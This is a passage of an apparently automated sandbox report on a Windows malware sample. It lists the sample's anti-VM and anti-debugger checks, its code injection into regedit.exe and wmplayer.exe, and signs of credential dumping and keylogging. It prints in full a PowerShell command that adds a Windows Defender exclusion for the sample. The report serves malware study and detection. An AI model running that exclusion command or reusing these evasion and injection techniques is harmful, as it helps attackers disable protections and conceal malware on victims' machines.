                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sysJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sysJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_2_004198C2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3687Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6037Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindow / User API: threadDelayed 9470Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeWindow / User API: foregroundWindowGot 1768Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI coverage: 9.5 %
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7212Thread sleep count: 221 > 30Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7212Thread sleep time: -110500s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216Thread sleep count: 53 > 30Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216Thread sleep time: -159000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216Thread sleep count: 9470 > 30Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe TID: 7216Thread sleep time: -28410000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,6_2_0041B42F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_2_0040B53A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0044D5E9 FindFirstFileExA,6_2_0044D5E9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,6_2_004089A9
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406AC2 FindFirstFileW,FindNextFileW,6_2_00406AC2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,6_2_00407A8C
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,6_2_00418C69
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,6_2_00408DA7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_100010F1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10006580 FindFirstFileExA,6_2_10006580
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_2_00406F06
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
                    Source: Amcache.hve.10.drBinary or memory string: VMware
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568703484.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE8C
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
                    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568703484.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
                    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
                    Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.000002430177C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: IB9876789000.bat.exe, 00000000.00000002.2244070577.0000024319463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: IB9876789000.bat.exe, 00000000.00000002.2242302990.0000024301472000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                    Source: bhvCBB7.tmp.13.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI call chain: ExitProcess graph end nodegraph_6-54220
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00442554 mov eax, dword ptr fs:[00000030h]6_2_00442554
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10004AB4 mov eax, dword ptr fs:[00000030h]6_2_10004AB4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,6_2_00410B19
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00434168
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0043A65D
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00433B44
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00433CD7 SetUnhandledExceptionFilter,6_2_00433CD7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_100060E2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_10002639
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10002B1C
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: IB9876789000.bat.exe, --------------.csReference to suspicious API methods: GetProcAddress(_05AD_0596_05CD_05C5_05F5_059A_05A0_05C0_05B0_0591_05B0_05C3_05C8, _059E_059A_05CD_05F3_05AB_05A0_05B7_05CF_05B7_0596_05B6_05C4_05EE_05BA_059B)
                    Source: IB9876789000.bat.exe, --------------.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)_05FD_05AB_05AD_05B0_05B0_05B8_0590_05F9_0599_05FC_05B2_05AC_05CA_05C1_05A0_05A2_05C1_059A.Length, 64u, out var _05A3_05B7_05A1_05B4_05A5_05F5_05AE_0598_059B_05CF_05C8_05C6_05A4_059D_05A8_05BE_05FE_05AD)
                    Source: IB9876789000.bat.exe, --------------.csReference to suspicious API methods: LoadLibrary(array5[0])
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -ForceJump to behavior
                    Contains functionality to inject code into remote processes
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,6_2_00417245
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Media Player\wmplayer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Media Player\wmplayer.exe protection: execute and read and writeJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Media Player\wmplayer.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 457000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 470000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 476000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Windows\regedit.exe base: 47B000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 457000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 470000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 476000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 47B000Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 9F5008Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe6_2_00410F36
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00418754 mouse_event,6_2_00418754
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"Jump to behavior
                    Source: wmplayer.exe, 00000006.00000002.4568703484.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\*|
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181930189.0000000000DDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: wmplayer.exe, 00000006.00000003.2186344104.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\M
                    Source: wmplayer.exe, 00000006.00000002.4568703484.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&3
                    Source: wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerv
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerckets=,W
                    Source: wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186344104.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: wmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.drBinary or memory string: [Program Manager]
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00433E0A cpuid 6_2_00433E0A
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoA,6_2_0040E679
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,6_2_004470AE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,6_2_004510BA
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004511E3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,6_2_004512EA
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_004513B7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,6_2_00447597
